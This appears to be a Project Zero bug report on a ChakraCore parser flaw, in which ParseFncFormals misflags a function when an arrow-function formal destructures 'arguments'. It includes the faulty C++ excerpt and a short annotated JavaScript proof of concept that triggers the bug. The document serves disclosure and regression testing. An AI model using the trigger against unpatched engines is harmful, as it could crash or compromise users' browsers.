<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1298
Similar to issue #1297, but this time it happens in "Parser::ParseFncFormals" with the "PNodeFlags::fpnArguments_overriddenInParam" flag.
template<bool buildAST>
void Parser::ParseFncFormals(ParseNodePtr pnodeFnc, ParseNodePtr pnodeParentFnc, ushort flags)
{
    ...
    if (IsES6DestructuringEnabled() && IsPossiblePatternStart())
    {
        ...
        // Instead of passing the STFormal all the way on many methods, it seems it is better to change the symbol type afterward.
        for (ParseNodePtr lexNode = *ppNodeLex; lexNode != nullptr; lexNode = lexNode->sxVar.pnodeNext)
        {
            Assert(lexNode->IsVarLetOrConst());
            UpdateOrCheckForDuplicateInFormals(lexNode->sxVar.pid, &formals);
            lexNode->sxVar.sym->SetSymbolType(STFormal);
            if (m_currentNodeFunc != nullptr && lexNode->sxVar.pid == wellKnownPropertyPids.arguments)
            {
                m_currentNodeFunc->grfpn |= PNodeFlags::fpnArguments_overriddenInParam; <<------ HERE
            }
        }
        ...
    ...
}
PoC:
-->
// Minimal input for the parser issue described in the header comment; useful
// as a regression test against a patched engine build.
// f's body is a destructuring assignment from the primitive 1. The target has
// no property `a`, so the default initializer is evaluated: an arrow function
// whose single formal is the array pattern `[arguments]`. The arrow function
// is only created, never called.
// NOTE(review): per the quoted ParseFncFormals excerpt, a destructured formal
// named `arguments` sets fpnArguments_overriddenInParam on m_currentNodeFunc.
// Presumably that node is f here rather than the arrow function, so f is
// wrongly treated as overriding `arguments` - confirm against the parser.
function f(){({a = ([arguments]) => {}} = 1);
// Reads f's own `arguments` object; presumably this is the access that
// misbehaves when f carries the flag by mistake - TODO confirm.
arguments.x;}
// Call f so the body above runs.
f();